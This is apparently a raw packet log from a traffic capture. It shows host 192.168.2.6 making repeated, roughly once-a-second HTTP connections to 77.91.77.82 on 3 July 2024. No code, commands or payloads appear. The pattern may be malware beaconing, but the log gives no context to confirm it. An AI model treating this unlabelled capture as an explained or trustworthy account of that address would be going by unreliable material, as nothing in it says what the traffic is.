                                                                Jul 3, 2024 08:38:51.520855904 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.520891905 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.520978928 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.521004915 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.521264076 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.526545048 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.301347971 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.301438093 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.304476023 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.309747934 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.526424885 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.526557922 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.640321970 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.640680075 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.645709991 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.645821095 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.645944118 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.646908998 CEST804974177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:52.646954060 CEST4974180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:52.650899887 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.354597092 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.354739904 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.355670929 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.360871077 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.579025984 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.579180002 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.687618971 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.688024998 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.692877054 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.692956924 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.693085909 CEST804974277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:53.693099022 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.693154097 CEST4974280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:53.697932005 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.396635056 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.396786928 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.397629023 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.402424097 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.620966911 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.621062040 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.734091043 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.734481096 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.739335060 CEST804974377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.739365101 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:54.739423037 CEST4974380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.739528894 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.739654064 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:54.744477987 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.419109106 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.419202089 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.420062065 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.424926996 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.633768082 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.634001970 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.749732018 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.750122070 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.754949093 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.755070925 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.755198002 CEST804974477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:55.755244970 CEST4974480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.755361080 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:55.760248899 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.431442022 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.432898998 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.433593988 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.438447952 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.646894932 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.646958113 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.750303984 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.750303984 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.755127907 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.755342007 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.755342007 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.755469084 CEST804974677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:56.755765915 CEST4974680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:56.760102987 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.430682898 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.430824995 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.431660891 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.436415911 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.645616055 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.645679951 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.749850988 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.750195026 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.755453110 CEST804974777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.755534887 CEST4974780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.755635977 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:57.755706072 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.755794048 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:57.761624098 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.461122036 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.461236954 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.461983919 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.466777086 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.684070110 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.684206009 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.796843052 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.797244072 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.802022934 CEST804974877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.802072048 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:58.802112103 CEST4974880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.802190065 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.802357912 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:58.807161093 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.495321035 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.497962952 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.498838902 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.503628016 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.714133978 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.714258909 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.828160048 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.828545094 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.833415985 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.833533049 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.833545923 CEST804974977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:59.833600044 CEST4974980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.833770037 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:59.838653088 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.519179106 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.519268036 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.521873951 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.526742935 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.736553907 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.736665964 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.843727112 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.844104052 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.849025965 CEST804975077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.849050045 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:00.849205971 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.849208117 CEST4975080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.849306107 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:00.854136944 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.553940058 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.554056883 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.554759979 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.559634924 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.777187109 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.777265072 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.890347004 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.890782118 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.895598888 CEST804975177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.895661116 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:01.895690918 CEST4975180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.895740986 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.896008968 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:01.901021004 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.584150076 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.584209919 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.614321947 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.621258974 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.831358910 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.831594944 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.937441111 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.937828064 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.942610979 CEST804975277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.942639112 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:02.942724943 CEST4975280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.942761898 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.942898035 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:02.947666883 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.655736923 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.655853987 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.656655073 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.661468983 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.882431030 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.882564068 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.984389067 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.984788895 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.989581108 CEST804975377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.989610910 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:03.989660025 CEST4975380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.989726067 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.989922047 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:03.994780064 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:04.677206993 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:04.677268028 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:04.678055048 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:04.683005095 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.063467979 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.063571930 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.174129009 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.174612999 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.179580927 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.179822922 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.179975033 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.180435896 CEST804975477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.180504084 CEST4975480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.184812069 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.876794100 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:05.876883984 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.877751112 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:05.883889914 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.095201969 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.095338106 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.204425097 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.205049038 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.209566116 CEST804975677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.209721088 CEST4975680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.209933996 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.210047007 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.210151911 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.214957952 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.887546062 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:06.888315916 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.888955116 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:06.893764973 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.102644920 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.102719069 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.219259977 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.219259977 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.224153996 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.224395037 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.224395037 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.224426031 CEST804975777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.224512100 CEST4975780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.229199886 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.928508997 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:07.928755999 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.929563999 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:07.934413910 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.149596930 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.149655104 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.265451908 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.265981913 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.270878077 CEST804975877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.270905018 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.270947933 CEST4975880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.271002054 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.271183014 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.275964975 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.985286951 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:08.985470057 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.988435984 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:08.993367910 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:09.214785099 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:09.214874029 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.327981949 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.328327894 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.333172083 CEST804975977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:09.333199024 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:09.333245039 CEST4975980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.333297014 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.333419085 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:09.338263035 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.010462046 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.010530949 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.011279106 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.016079903 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.224499941 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.224948883 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.328109980 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.328509092 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.333244085 CEST804976077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.333472967 CEST4976080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.333695889 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:10.333777905 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.334022999 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:10.338922024 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.029293060 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.032984972 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.033631086 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.038444996 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.251535892 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.251601934 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.359527111 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.359915018 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.364728928 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.364834070 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.364980936 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.365138054 CEST804976177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:11.365199089 CEST4976180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:11.369771004 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.041493893 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.041600943 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.042407036 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.047152042 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.259670973 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.259809971 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.375545025 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.375901937 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.382275105 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.382411003 CEST804976277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:12.382488966 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.382539034 CEST4976280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.382735968 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:12.387650013 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.074999094 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.075136900 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.079147100 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.083983898 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.300297022 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.300421000 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.407726049 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.408113956 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.412980080 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.413005114 CEST804976377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:13.413136005 CEST4976380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.413151026 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.413486004 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:13.418345928 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.106231928 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.106369019 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.107431889 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.112380028 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.329005957 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.329097986 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.437943935 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.438330889 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.443205118 CEST804976477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.443222046 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:14.443310022 CEST4976480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.443375111 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.443593979 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:14.448362112 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.121663094 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.121810913 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.122597933 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.127918959 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.334474087 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.334633112 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.437510014 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.437854052 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.442747116 CEST804976577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.442766905 CEST804976677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:15.442852020 CEST4976580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.442897081 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.443147898 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:15.448009968 CEST804976677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:16.129196882 CEST804976677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:16.129448891 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.132478952 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.137360096 CEST804976677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:16.350755930 CEST804976677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:16.350917101 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.456784964 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.457163095 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.462848902 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:16.462960005 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.463082075 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.463175058 CEST804976677.91.77.82192.168.2.6
